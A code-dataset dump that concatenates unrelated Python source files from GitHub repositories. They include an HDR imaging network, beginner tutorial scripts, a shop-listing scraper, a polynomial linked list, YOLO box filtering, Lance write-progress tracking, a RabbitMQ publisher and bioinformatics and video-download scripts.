self.dphi = 2 * np.pi/args.width\n self.dtheta = np.pi/args.height\n \n phi = torch.zeros((self.args.height//2, self.args.width))\n theta = torch.zeros((self.args.height//2, self.args.width))\n \n for y in range(self.args.height//2):\n for x in range(self.args.width):\n phi[y,x] = (x / args.width) * 2 * np.pi\n theta[y,x] = (y / args.height) * np.pi\n self.register_buffer(\"phi\", phi.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n self.register_buffer(\"theta\", theta.unsqueeze(0).repeat(args.batch_size//torch.cuda.device_count(),1,1))\n \n def forward(self, hdr):\n img = 179 * (hdr[:,0,:,:] * 0.2126 + hdr[:,1,:,:] * 0.7152 + hdr[:,2,:,:] * 0.0722)\n output = img[:,0:self.args.height//2,:].mul(torch.sin(self.theta)).mul(torch.cos(self.theta)) * self.dphi * self.dtheta\n return output.sum([1,2]) / 1000.0\n\n\n\nclass HDR_net(nn.Module):\n def __init__(self, args):\n super(HDR_net, self).__init__()\n\n self.dequantization = Dequantization_net()\n self.linearization = Linearization_net()\n self.halluicnation = Hallucination_net(args)\n\n def sample_1d(self, img, y_idx):\n b, h, c = img.shape\n b, n = y_idx.shape\n \n b_idx = torch.arange(b).float().cuda()\n b_idx = b_idx.unsqueeze(-1)\n b_idx = b_idx.repeat(1, n)\n \n y_idx = torch.clamp(y_idx, 0, h-1)\n a_idx = torch.stack([b_idx, y_idx], axis=-1).long()\n batch_out = []\n for i in range(b):\n out = img[list(a_idx[i].T)]\n batch_out.append(out)\n output = torch.cat(batch_out, axis=0)\n return output.reshape(b,n,c)\n\n\n def interp_1d(self, img, y):\n b, h, c = img.shape\n b, n = y.shape\n\n y_0 = torch.floor(y)\n y_1 = y_0 + 1\n\n y_0_val = self.sample_1d(img, y_0)\n y_1_val = self.sample_1d(img, y_1)\n\n w_0 = (y_1 - y).unsqueeze(-1)\n w_1 = (y - y_0).unsqueeze(-1)\n return w_0 * y_0_val + w_1 * y_1_val\n\n def apply_rf(self, x, rf):\n input_shape = x.shape\n b, k = rf.shape\n x = self.interp_1d(rf.unsqueeze(-1), (k-1)*x.reshape(b,-1))\n return x.reshape(input_shape)\n \n def forward(self, input, exposure):\n C_pred = self.dequantization(input)\n C_pred = torch.clamp(C_pred, 0, 1)\n # C_pred: output of dequantiation\n\n pred_invcrf = self.linearization(C_pred, exposure)\n B_pred = self.apply_rf(C_pred, pred_invcrf)\n\n thr = 0.12\n alpha, _ = torch.max(B_pred, 1)\n alpha = torch.clamp(torch.clamp(alpha-1.0+thr, max=0.0) / thr, 
min=1.0)\n alpha = alpha.unsqueeze(1).repeat(1,3,1,1)\n y_predict, vgg_conv_layers = self.halluicnation(B_pred, exposure)\n y_predict = F.relu(y_predict)\n A_pred = B_pred + alpha * y_predict\n\n return C_pred, B_pred, A_pred\n\n\n\n","repo_name":"wwzjer/HDR","sub_path":"network_integrate.py","file_name":"network_integrate.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23478424272","text":"#this is the function\ndef HelloWord():\n print(\"Hello World\")\n\n#now you have to call it\nHelloWord()\n\ndef Greeting(name):\n print(\"Hi \" + name + \"!\")\n\nGreeting(\"Hope\")\n\ndef Add(num1, num2):\n print(num1 + num2)\n\nAdd(1, 4)\n\n#return statement\n#python will stop running once return is called!\ndef ReturnAdd(num1, num2):\n return (num1 + num2)\n\nsum = ReturnAdd(12, 34)\n\nprint(sum)\n\n#in-built functions\n\n#abs\n#call it on any positive or negative number\n#will get the absolute value of that number\nabs(34)\n\n#bool\n#bool of zero is false\n#bool of any other number is true\n#bool of none is false\nbool(0)\n\n#dir\n#gives you a list of anything you can do with a specific data type\n#will show you built-in functions of that data type\ndir(\"hello\")\n\n#help\n#takes in a function name\n#will show you what that function does\nex = \"hello\"\nhelp(ex.upper)\nhelp(ex.splitlines)\n\n#eval\n#run python code in a string format\nex2 = 'print(\"hi\")'\neval(ex2)\n\n#exec\n#similar to eval\n#for more complicated code\nexec(ex2)\n\n#converting data types\na = 1\nstr(a)\n#\"a\"\nfloat(a)\n#1.0\nint(a)\n#1\n\n","repo_name":"hopegiometti/LearningPython","sub_path":"syntax/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73769676093","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 27 Aug, 2014\n\n@author: wangyi\n'''\n\nfrom datetime import *\nfrom copy import *\n\nimport re\n\nclass Shop(object):\n '''\n classdocs\n '''\n param = {\n# 'id' : None,\n 'title' : None, \n# 'tmv' : None,\n# 'price' : None,\n# 'merchanturl' : None,\n 'httpurl_shop' : None,\n 'httpurl_commodity' : None,\n# 'rank' : 'NULL',\n 'noOfBuiers' : 'NULL',\n 'noOfComments' : 'NULL'\n }\n \n htmlmapping = {\n 'shop':\"div.col.item.st-item\", \n 'entry':\"div.tb-content\", \n }\n \n items = 100\n \n sqlcreate = \"\"\"\nCREATE TABLE `TBMerchantCredit`.`%s` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `httpurl_shop` VARCHAR(45) NOT NULL,\n `httpurl_commodity` VARCHAR(45) NOT NULL, \n `title` VARCHAR(45) NOT NULL,\n `tags` VARCHAR(45) NOT NULL,\n `rank_tags` INT NULL,\n `price` INT NULL, \n `tmv` DATE NOT NULL,\n `noOfBuiers` INT NULL,\n `noOfComments` INT NULL,\n PRIMARY KEY (`id`),\n UNIQUE INDEX `rank_tags_UNIQUE` (`rank_tags` ASC)); \n\"\"\"\n sqlinsert = \"\"\"\nINSERT INTO %s (`id`, `httpurl_shop`, `httpurl_commodity`, `title`, `tags`, `price`, `rank_tags`, `noOfBuiers`, `noOfComments`, `tmv`) VALUES (NULL, %(httpurl_shop)s, %(httpurl_commodity)s, %(title)s, %(tags)s, %(price)s, %(rank_tags)s, %(noOfBuiers)s, %(noOfComments)s, now()) \n\"\"\"\n#data = [('www.yiak.co', 'shiyishi', 'shoubiao', 1,2,3), ('www.yiak.co2', 'shiyishi2', 'shoubiao', 4,5,6)]\n def __init__(self):\n '''\n Constructor\n '''\n pass\n \n def extractEntry(self, dom):\n try:\n ShopsEntries = dom.find(\"div#mainsrp-itemlist\")\n \n # 9-2015,formatter\n #dom(\"div#mainsrp-spucombo\")\n # 9-2014, formatter\n 
#dom(\"div.tb-content\").children(\"div.col.item.st-item\")\n except Exception as e:\n raise(e)\n \n return ShopsEntries\n \n def extractShopUrl(self, shopAnchor):\n try:\n self.param['httpurl_shop'] = shopAnchor(\"div.col.seller\").children(\"a\").attr(\"href\")#div.col.seller.feature-dsi-tgr.popup-tgr\n except Exception as e:\n raise(e)\n \n def extractCommUrl(self, shopAnchor):\n try: \n self.param['httpurl_commodity'] = shopAnchor(\"h3.summary\").children(\"a\").attr(\"href\") \n except AttributeError as e:\n raise(e) \n \n def extractTitle(self, shopAnchor):\n try: \n self.param['title'] = shopAnchor(\"h3.summary\").children(\"a\").attr(\"title\") \n except AttributeError as e:\n raise(e)\n \n def extractNumofBuyers(self, shopAnchor):\n try:\n pattern = re.compile(\"\\d+\")\n noOfBuierstxt = shopAnchor(\"div.col.end.dealing\").text()#.encode('unicode-escape')\n self.param['noOfBuiers'] = int(re.search(pattern, noOfBuierstxt).group())\n except AttributeError as e:\n raise(e)\n \n def extractPrice(self, shopAnchor):\n try:\n pattern = re.compile(\"\\d+\\.\\d+\")\n pricetxt = shopAnchor(\"div.col.price.g_price.g_price-highlight\").text()#.encode('unicode-escape')\n self.param['price'] = float(re.search(pattern, pricetxt).group()) \n except AttributeError as e:\n raise(e) \n \n \n def fire(self, dom, tags_str):\n self.param['tags'] = tags_str\n \n index = 0\n list = [ ]\n \n while index < self.items:\n \n try:\n self.param['rank_tags'] = index\n \n # get shop anchor\n shopAnchor = self.extractEntry(dom).eq(index)\n \n # get details\n self.extractShopUrl(shopAnchor)\n self.extractCommUrl(shopAnchor)\n \n self.extractTitle(shopAnchor)\n self.extractNumofBuyers(shopAnchor)\n self.extractPrice(shopAnchor)\n \n list.append( self.param.copy() )\n \n index += 1\n except AttributeError as e:\n break \n \n return list\n \n __call__ = fire\n \n","repo_name":"yiakwy/Crawler","sub_path":"src/DBManagement/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40941734728","text":"from django.urls import path\n\nfrom .views import NewRent, RentListView\n\napp_name = \"rent\"\n\nurlpatterns = [\n path(\"new-rent/\", NewRent.as_view(), name=\"new_rent\"),\n path(\"\", RentListView.as_view(), name=\"rent_list\"),\n]\n","repo_name":"lsujh/rent_book","sub_path":"rent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70658246013","text":"class Nodo(object):\n info,sig = None, None \n\nclass datoPolinomio(object):\n\n def __init__(self, valor, termino):\n self.valor = valor\n self.termino = termino\n\nclass Polinomio(object):\n def __init__(self):\n self.termino_may= None\n self.grado = -1\n \n def agregar_termino(polinomio,termino,valor):\n aux = Nodo()\n dato = datoPolinomio(valor,termino)\n aux.info = dato \n if (termino > polinomio.grado):\n aux.sig = polinomio.termino_mayor\n polinomio.termino_mayor = aux\n polinomio.grado = termino\n else:\n actual = polinomio.termino_mayor\n while actual.sig is not None and termino < actual.info.termino:\n actual = actual.sig\n actual.sig = aux\n def modificar_termino(polinomio,termino,valor):\n aux = polinomio.termino_mayor\n while aux is not None and aux.info.termino != termino:\n aux = aux.sig\n aux.info.valor = valor \n\n def obtener_valor(polinomio,termino):\n aux = polinomio.termino_mayor\n if aux is not 
None and aux.info.termino > termino:\n aux = aux.sig\n elif aux is not None and aux.info.termino == termino:\n return aux.info.valor\n else:\n return 0 \n\n def mostrar (polinomio):\n aux = polinomio.termino_mayor\n poli = \"\"\n signo = \"\"\n if aux.info.valor >= 0:\n singo += \"+\"\n pol += signo + str(aux.info.valor) + \"x**\" + str(aux.info.termino) \n else:\n return poli\n \n def restar (polinomio1,polinomio2):\n paux = Polinomio()\n if polinomio1> polinomio2:\n mayor = polinomio1\n else:\n mayor = polinomio2\n for i in range(0, mayor.grado +1):\n total = polinomio1.obtener_valor(polinomio1, i) - polinomio2.obtener_valor(polinomio2, i)\n if total != 0:\n total.agregar_termino (paux, i , total)\n return paux\n \n def dividir (polinomio1,polinomio2):\n paux = Polinomio()\n pol1 = polinomio1.termino_mayor\n while pol1 is not None:\n pol2 = polinomio2.termino_mayor\n while pol2 is not None:\n termino = pol1.info.termino + pol2.info.termino\n valor = pol1.info.valor / pol2.info.valor\n if valor.obtener_valor(paux, termino) != 0:\n valor += valor.obtener_valor(paux, termino)\n termino.modificar_termino (paux, termino, valor)\n else:\n termino.agregar_termino(paux, termino, valor)\n pol2 = pol2.sig\n pol1 = pol1.sig\n return paux\n\nP1 = Polinomio()\nP2 = Polinomio()\nprint(P1)\nprint(P2)","repo_name":"Diegopj22/ejercicios_tema3","sub_path":"ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33780766429","text":"import numpy as np\r\n\r\n\r\ndef filter_boxes(box_confidence, boxes_all, box_class_probs, score_threshold = 0.6):\r\n ''' Returns the scores, boxes and classes identified from\r\n the parameters given in arguments\r\n\r\n :param\r\n box_confidence -- (1, 7, 7), pc values\r\n boxes_all -- (4, 7, 7), coordinates of upper left and bottom right corners of the bounding box w.r.t. 
the 7x7 full grid\r\n box_class_probs -- (25, 7, 7), class probabilities\r\n score_threshold -- to get rid from unnecessary boxes\r\n\r\n :return\r\n scores -- containing class probability score for \"selected\" boxes\r\n boxes -- containing (b_x, b_y, b_h, b_w) coordinates of \"selected\" boxes\r\n classes -- containing the index of the class detected by the \"selected\" boxes'''\r\n\r\n box_scores = box_confidence * box_class_probs # 7x7x25\r\n print('box scores = \\n', box_scores)\r\n\r\n # Step 1 - getting all maximum scores to a 2D array\r\n box_classes = np.zeros((7, 7)) # for index\r\n box_class_scores = np.zeros((7, 7)) # for maximums\r\n for row in range(7):\r\n for col in range(7):\r\n temp_max = 0\r\n temp_layer = 0\r\n for layer in range(25):\r\n if box_scores[layer, row, col] >= temp_max:\r\n temp_max = box_scores[layer, row, col]\r\n temp_layer = layer+1\r\n box_class_scores[row, col] = temp_max\r\n box_classes[row, col] = temp_layer\r\n\r\n print('box classes = \\n', box_classes)\r\n print('shape of box classes: ', box_classes.shape)\r\n print('box class scores = \\n', box_class_scores)\r\n print('shape of box class scores: ', box_class_scores.shape, '\\n')\r\n\r\n # Step 2 - Filtering by threshold\r\n scores = [] # python list\r\n boxes = [] # going to make a 2D list\r\n classes = [] # python list\r\n for r in range(7):\r\n for c in range(7):\r\n if box_class_scores[r, c] >= score_threshold:\r\n scores.append(box_class_scores[r, c])\r\n classes.append(box_classes[r, c])\r\n boxes.append([boxes_all[0, r, c], boxes_all[1, r, c], boxes_all[2, r, c], boxes_all[3, r, c],])\r\n\r\n print('scores = \\n', scores)\r\n print('shape of scores: ', len(scores), '\\n')\r\n print('classes = \\n', classes)\r\n print('shape of classes: ', len(classes), '\\n')\r\n print('boxes = \\n',)\r\n for R in boxes:\r\n for C in R:\r\n print(C, end=\"\\t\")\r\n print()\r\n print('shape of boxes: ', len(boxes))\r\n print(boxes)\r\n\r\n return scores, boxes, classes\r\n","repo_name":"matheesha27/Low-level-YOLO-Implementation","sub_path":"Filter_Boxes.py","file_name":"Filter_Boxes.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30047374611","text":"from onset import *\nimport glob\n\n#This code is an example of how you can use this module to write you analysis yourself. It will not run on any data as I used it \n#on my own data so it works currently. 
It is more meant to be used for inspiration and should be adjusted accordingly\n\ndef example_for_folder(): \n #Select model from https://www.sbert.net/docs/pretrained_models.html an input as string\n #decision_value = finding_appropriate_value(model)\n decision_value = 0.5\n #defining the paths to use\n original_path = os.getcwd()\n path_to_audios = original_path + os.sep + \"Voice_Data\"\n datafile = pd.read_csv(\"Combined Values from Participants.csv\")\n\n #creating empty lists and setting it up \n os.chdir(path_to_audios)\n files = glob.glob(\"*\")\n list_of_answers = []\n list_of_file_names = []\n list_of_onset = []\n\n for file in files: \n new_path = path_to_audios + os.sep + file\n os.chdir(new_path)\n files_in_folder = glob.glob(\"*\")\n for file1 in files_in_folder:\n if file1 == \"1\":\n nothing = 0 \n else:\n continue\n os.chdir(new_path + os.sep + file1)\n files_in_folder1 = glob.glob(\"*\")\n for file2 in files_in_folder1:\n print(file2)\n target_word_row = datafile.loc[datafile[\"File\"] == file2, \"Target\"].values\n try: \n target_word = str(target_word_row[0])\n except: \n continue\n word_used, outcome_value = binary_search(file2, \"en-US\", target_word, decision_value=decision_value)\n list_of_answers.append(word_used)\n list_of_file_names.append(file2)\n list_of_onset.append(outcome_value)\n\n #Creating a dataframe and saving the results into one file\n df = pd.DataFrame()\n df['File']=list_of_file_names\n df['Answer']=list_of_answers\n df['Onset'] = list_of_onset\n\n os.chdir(original_path)\n df.to_csv(\"Answers_as_text_for_testing_3.csv\")\n","repo_name":"Flo2306/Voice_Onset","sub_path":"Voice_Onset/Example_analysis.py","file_name":"Example_analysis.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37949513226","text":"from __future__ import annotations\n\nimport json\nimport os\nfrom abc import ABC, abstractmethod\nfrom typing import TYPE_CHECKING, Dict, Optional\n\nfrom .lance import _cleanup_partial_writes\n\nif TYPE_CHECKING:\n # We don't import directly because of circular import\n from .fragment import FragmentMetadata\n\n\nclass FragmentWriteProgress(ABC):\n \"\"\"Progress tracking for Writing a Dataset or Fragment.\n\n Warns\n -----\n This tracking class is experimental and may change in the future.\n \"\"\"\n\n def _do_begin(\n self, fragment_json: str, multipart_id: Optional[str] = None, **kwargs\n ):\n \"\"\"Called when a new fragment is created\"\"\"\n from .fragment import FragmentMetadata\n\n fragment = FragmentMetadata.from_json(fragment_json)\n return self.begin(fragment, multipart_id, **kwargs)\n\n @abstractmethod\n def begin(\n self, fragment: \"FragmentMetadata\", multipart_id: Optional[str] = None, **kwargs\n ) -> None:\n \"\"\"Called when a new fragment is about to be written.\n\n Parameters\n ----------\n fragment : FragmentMetadata\n The fragment that is open to write to. The fragment id might not\n yet be assigned at this point.\n multipart_id : str, optional\n The multipart id that will be uploaded to cloud storage. 
This may be\n used later to abort incomplete uploads if this fragment write fails.\n kwargs: dict, optional\n Extra keyword arguments to pass to the implementation.\n\n Returns\n -------\n None\n \"\"\"\n pass\n\n def _do_complete(self, fragment_json: str, **kwargs):\n \"\"\"Called when a fragment is completed\"\"\"\n from .fragment import FragmentMetadata\n\n fragment = FragmentMetadata.from_json(fragment_json)\n return self.complete(fragment, **kwargs)\n\n @abstractmethod\n def complete(self, fragment: \"FragmentMetadata\", **kwargs) -> None:\n \"\"\"Callback when a fragment is completely written.\n\n Parameters\n ----------\n fragment : FragmentMetadata\n The fragment that is open to write to.\n kwargs: dict, optional\n Extra keyword arguments to pass to the implementation.\n \"\"\"\n pass\n\n\nclass NoopFragmentWriteProgress(FragmentWriteProgress):\n \"\"\"No-op implementation of WriteProgressTracker.\n\n This is the default implementation.\n \"\"\"\n\n def begin(\n self, fragment: \"FragmentMetadata\", multipart_id: Optional[str] = None, **kargs\n ):\n pass\n\n def complete(self, fragment: \"FragmentMetadata\", **kwargs):\n pass\n\n\nclass FileSystemFragmentWriteProgress(FragmentWriteProgress):\n \"\"\"Progress tracking for Writing a Dataset or Fragment.\n\n Warns\n -----\n This tracking class is experimental and will change in the future.\n\n This implementation writes a JSON file to track in-progress state\n to the filesystem for each fragment.\n\n\n \"\"\"\n\n PROGRESS_EXT: str = \".in_progress\"\n\n def __init__(self, base_uri: str, metadata: Optional[Dict[str, str]] = None):\n \"\"\"Create a FileSystemFragmentWriteProgress tracker.\n\n Parameters\n ----------\n base_uri : str\n The base directory to write the progress files to. Two files will be created\n under this directory: a Fragment file, and a JSON file to track progress.\n metadata : dict, optional\n Extra metadata for this Progress tracker instance. 
Can be used to track\n distributed worker where this tracker is running.\n \"\"\"\n from pyarrow.fs import FileSystem\n\n fs, path = FileSystem.from_uri(base_uri)\n self._fs = fs\n self._base_path: str = path\n self._metadata = metadata if metadata else {}\n\n def _in_progress_path(self, fragment: \"FragmentMetadata\") -> str:\n return os.path.join(\n self._base_path, f\"fragment_{fragment.id}{self.PROGRESS_EXT}\"\n )\n\n def _fragment_file(self, fragment: \"FragmentMetadata\") -> str:\n return os.path.join(self._base_path, f\"fragment_{fragment.id}.json\")\n\n def begin(\n self, fragment: \"FragmentMetadata\", multipart_id: Optional[str] = None, **kwargs\n ):\n \"\"\"Called when a new fragment is created.\n\n Parameters\n ----------\n fragment : FragmentMetadata\n The fragment that is open to write to.\n multipart_id : str, optional\n The multipart id to upload this fragment to cloud storage.\n \"\"\"\n\n self._fs.create_dir(self._base_path, recursive=True)\n\n with self._fs.open_output_stream(self._in_progress_path(fragment)) as out:\n progress_data = {\n \"fragment_id\": fragment.id,\n \"multipart_id\": multipart_id if multipart_id else \"\",\n \"metadata\": self._metadata,\n }\n out.write(json.dumps(progress_data).encode(\"utf-8\"))\n\n with self._fs.open_output_stream(self._fragment_file(fragment)) as out:\n out.write(json.dumps(fragment.to_json()).encode(\"utf-8\"))\n\n def complete(self, fragment: \"FragmentMetadata\", **kwargs):\n \"\"\"Called when a fragment is completed\"\"\"\n self._fs.delete_file(self._in_progress_path(fragment))\n\n def cleanup_partial_writes(self, dataset_uri: str) -> int:\n \"\"\"\n Finds all in-progress files and cleans up any partially written data\n files. This is useful for cleaning up after a failed write.\n\n Parameters\n ----------\n dataset_uri : str\n The URI of the table to clean up.\n\n Returns\n -------\n int\n The number of partial writes cleaned up.\n \"\"\"\n from pyarrow.fs import FileSelector\n\n from .fragment import FragmentMetadata\n\n marker_paths = []\n objects = []\n selector = FileSelector(self._base_path)\n for info in self._fs.get_file_info(selector):\n path = info.path\n if path.endswith(self.PROGRESS_EXT):\n marker_paths.append(path)\n with self._fs.open_input_stream(path) as f:\n progress_data = json.loads(f.read().decode(\"utf-8\"))\n\n json_path = path.rstrip(self.PROGRESS_EXT) + \".json\"\n with self._fs.open_input_stream(json_path) as f:\n fragment_metadata = FragmentMetadata.from_json(\n f.read().decode(\"utf-8\")\n )\n objects.append(\n (\n fragment_metadata.data_files()[0].path(),\n progress_data[\"multipart_id\"],\n )\n )\n\n _cleanup_partial_writes(dataset_uri, objects)\n\n for path in marker_paths:\n self._fs.delete_file(path)\n json_path = path.rstrip(self.PROGRESS_EXT) + \".json\"\n self._fs.delete_file(json_path)\n\n return len(objects)\n","repo_name":"lancedb/lance","sub_path":"python/python/lance/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":2819,"dataset":"github-code","pt":"78"} +{"seq_id":"74611875770","text":"import pika\nimport json\nimport numpy as np\nimport time\nfrom datetime import datetime\nfrom sklearn.datasets import load_diabetes\n\nX, y = load_diabetes(return_X_y=True)\n\nwhile True:\n try:\n random_row = np.random.randint(0, X.shape[0] - 1)\n\n connection = pika.BlockingConnection(pika.ConnectionParameters('rabbitmq'))\n channel = connection.channel()\n\n channel.queue_declare(queue='Features')\n 
channel.queue_declare(queue='y_true')\n\n X_dict = {'time': time.time(), 'X_row_index': random_row, 'X_row': list(X[random_row])}\n channel.basic_publish(exchange='',\n routing_key='Features',\n body=json.dumps(X_dict))\n datetime_str = datetime.fromtimestamp(X_dict['time']).strftime('%Y-%m-%d %A %H:%M:%S %f us |')\n print(f'{datetime_str} -> Сообщение с вектором признаков отправлено в очередь:')\n print(f' {X_dict}'[:150])\n\n y_dict = {'time': time.time(), 'y_row_index': random_row, 'y': y[random_row]}\n channel.basic_publish(exchange='',\n routing_key='y_true',\n body=json.dumps(y_dict))\n datetime_str = datetime.fromtimestamp(y_dict['time']).strftime('%Y-%m-%d %A %H:%M:%S %f us |')\n print(f'{datetime_str} -> Сообщение с правильным ответом отправлено в очередь:')\n print(f' {y_dict}'[:150])\n connection.close()\n time.sleep(5)\n except:\n print('Не удалось подключиться к очереди')\n time.sleep(5)\n","repo_name":"avfawkes/docker_compose_rabbitmq","sub_path":"features/src/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1303815455","text":"from collections import Counter\n\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n s_counter = Counter(s)\n t_counter = Counter(t)\n return s_counter == t_counter\n\nb = Solution().isAnagram('rar', 'arr')\nprint(b)\n","repo_name":"MiketheViking90/leetcodepython","sub_path":"app/src/algos/valid_anagram.py","file_name":"valid_anagram.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39680853852","text":"from ..database.crud.user import get_random_user\nfrom ..database.crud.post import get_posts\nfrom ..database.crud.like import list_post_likes, get_key_like, has_liked\nfrom ..database.crud.comment import get_key_comment, list_post_comments\nfrom ..database.crud.bookmark import has_bookmarked\nfrom ..database.database import get_db\nfrom ..database.models import (\n User, Post, Like, Bookmark, Comment\n)\nfrom ..database.schemas.post import (\n GetPosts, PostAuthor, GetPost, PostLike, KeyComment, PostSchema\n)\nfrom ..database.schemas.activity import CreateActivity\nfrom flask import url_for\nfrom pydantic import ValidationError\nfrom sqlalchemy.exc import OperationalError, IntegrityError\nfrom datetime import datetime\n\ndef load_posts(offset: int = 0, limit: int = 10) -> None:\n user: User = get_random_user(get_db)\n try:\n posts = get_posts(get_db, GetPosts(offset=offset, limit=limit))\n except (OperationalError, IntegrityError) as e:\n print(e)\n # Send email to\n return {'Error': 'The application is experiencing a tempoary error. 
Please try again in a few minutes.'}, HTTPStatus.INTERNAL_SERVER_ERROR\n created_posts = []\n for post in posts:\n post_author: PostAuthor = PostAuthor(\n id=post.author.id,\n profile_picture=url_for('static', filename=f'img/{post.author.profile_picture_url}'),\n name=post.author.first_name\n )\n post_likes = [\n PostAuthor(\n id=like.author.id,\n profile_picture=url_for('static', filename=f'img/{like.author.profile_picture_url}'),\n name=like.author.first_name\n )\n for like in list_post_likes(session=get_db, post_data=GetPost(post_id=post.id))\n ]\n key_like: User = get_key_like(session=get_db, post_data=GetPost(post_id=post.id))\n if key_like:\n key_like = PostAuthor(\n id=key_like.id,\n profile_picture=url_for('static', filename=f'img/{key_like.profile_picture_url}'),\n name=key_like.first_name\n )\n post_like: PostLike = PostLike(\n liked=has_liked(get_db, CreateActivity(user_id=user.id, post_id=post.id)),\n liked_by=post_likes,\n key_like=key_like,\n likes_count=len(post_likes)\n )\n key_comment: Comment = get_key_comment(session=get_db, post_data=GetPost(post_id=post.id))\n if key_comment:\n key_comment_author = PostAuthor(\n id=key_comment.author.id,\n profile_picture=url_for('static', filename=f'img/{key_comment.author.profile_picture_url}'),\n name=key_comment.author.first_name,\n )\n key_comment: KeyComment = KeyComment(\n author=key_comment_author,\n text=key_comment.comment_text,\n comments_count=len(list_post_comments(session=get_db, post_data=GetPost(post_id=post.id)))\n )\n post_schema: PostSchema = PostSchema(\n id=post.id,\n text=post.text,\n image=url_for('static', filename=f'img/{post.image_url}'),\n location=post.location,\n date_published=str(int((post.date_published - datetime.now()).seconds/60)),\n author=post_author,\n like=post_like,\n key_comment=key_comment,\n bookmarked=has_bookmarked(get_db, CreateActivity(user_id=user.id, post_id=post.id))\n ).model_dump()\n created_posts.append(post_schema)\n return created_posts","repo_name":"twyle/butterfly","sub_path":"services/app/butterfly/blueprints/home/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24949160181","text":"import os,sys\ndataset1,dataset2=sys.argv[1],sys.argv[2]\ndkplrun1,dkplrun2=sys.argv[3],sys.argv[4]\neve=['SNV','splice','split','lincRNA','intron','repeat','unmapped']\nfeatures=[]\nfor e in eve:\n if os.path.exists('Report_%s.txt'%e) is False or int(os.popen('wc -l Report_%s.txt'%e).readline().strip().split()[0])==0:continue\n with open('Report_%s.txt'%e)as f:\n pairs=list(map(lambda x:x.strip().split(),f))\n features+=[i[:2] for i in pairs]\ndict_2luad={}\nfor i in features:\n dict_2luad[i[1]]=i[0]\nshared_contig_tcga=list(set([i[0] for i in features]))\nshared_contig_seo=list(set([i[1] for i in features]))\n\nwith open(dataset2)as f:\n seodat=list(map(lambda x:x.strip().split(),f))\nwith open(dataset1)as f:\n tcgadat=list(map(lambda x:x.strip().split(),f))\nhit_idx_seo=seodat[0].index('nb_hit')\nhit_idx_tcga=tcgadat[0].index('nb_hit')\nouttcga=open('overlap_contig','w')\nouttcga.write('\\t'.join(tcgadat[0])+'\\n')\nc=0\nfor line in tcgadat:\n if line[2] in dict_2luad.values() and int(float(line[hit_idx_tcga]))==1:\n outtcga.write(line[2]+'\\t'+'\\t'.join(line[1:])+'\\n')\nouttcga.close()\n\nimport pandas as pd\ndegfile1=os.popen('ls %s/gene_expression/*DEGs.tsv'%dkplrun2).readline().strip()\nwith open(degfile1)as f:\n seodat=list(map(lambda 
x:x.strip().split(),f))\ndegfile2=os.popen('ls %s/gene_expression/*DEGs.tsv'%dkplrun1).readline().strip()\nwith open(degfile2)as f:\n tcgadat=list(map(lambda x:x.strip().split(),f))\ntcgadat=[i for i in tcgadat if 'NA' not in i]\nseodat=[i for i in seodat if 'NA' not in i]\nseodeg=[i[0] for i in seodat[1:] if abs(float(i[2]))>2 and float(i[-1])<0.05]\ntcgadeg=[i[0] for i in tcgadat[1:] if abs(float(i[2]))>2 and float(i[-1])<0.05]\n\nshared_DEG=list(set(seodeg)&set(tcgadeg))\nwith open(dkplrun2+'/gene_expression/normalized_counts.tsv')as f:\n seocount=list(map(lambda x:x.strip().split(),f))\nwith open(dkplrun1+'/gene_expression/normalized_counts.tsv')as f:\n tcgacount=list(map(lambda x:x.strip().split(),f))\nouttcga=open('overlap_gene','w')\nouttcga.write('\\t'.join(tcgacount[0])+'\\n')\nfor i in tcgacount:\n if i[0] in shared_DEG:outtcga.write('\\t'.join(i)+'\\n')\nouttcga.close()\n\n","repo_name":"Transipedia/dekupl-lung-cancer-inter-cohort","sub_path":"bin/create_traindat.py","file_name":"create_traindat.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35815345242","text":"import cv2\nimport os\n\nfrom pytube import YouTube\nfrom IPython.display import HTML\n\nurl = \"https://www.youtube.com/watch?v=0TNFb5zgpbg&list=PL3NgX4uqPt40T1iNoiN9z8CErtWHm06El\"\n\nyt = YouTube(url)\n\nstream = yt.streams.filter(progressive=True, file_extension=\"mp4\").order_by(\"resolution\").desc().first()\n\nstream.download(\"./data/\")\n\nHTML(\"\"\"\n \n \"\"\"\n )\n\n#위에서 다운받은 동영상을 불러온다.\ncap = cv2.VideoCapture(\"./data/저작권 없는 무료 영상 소스 여의도 벚꽃 free video (cherry blossoms).mp4\")\n\n# print(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n# print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n# 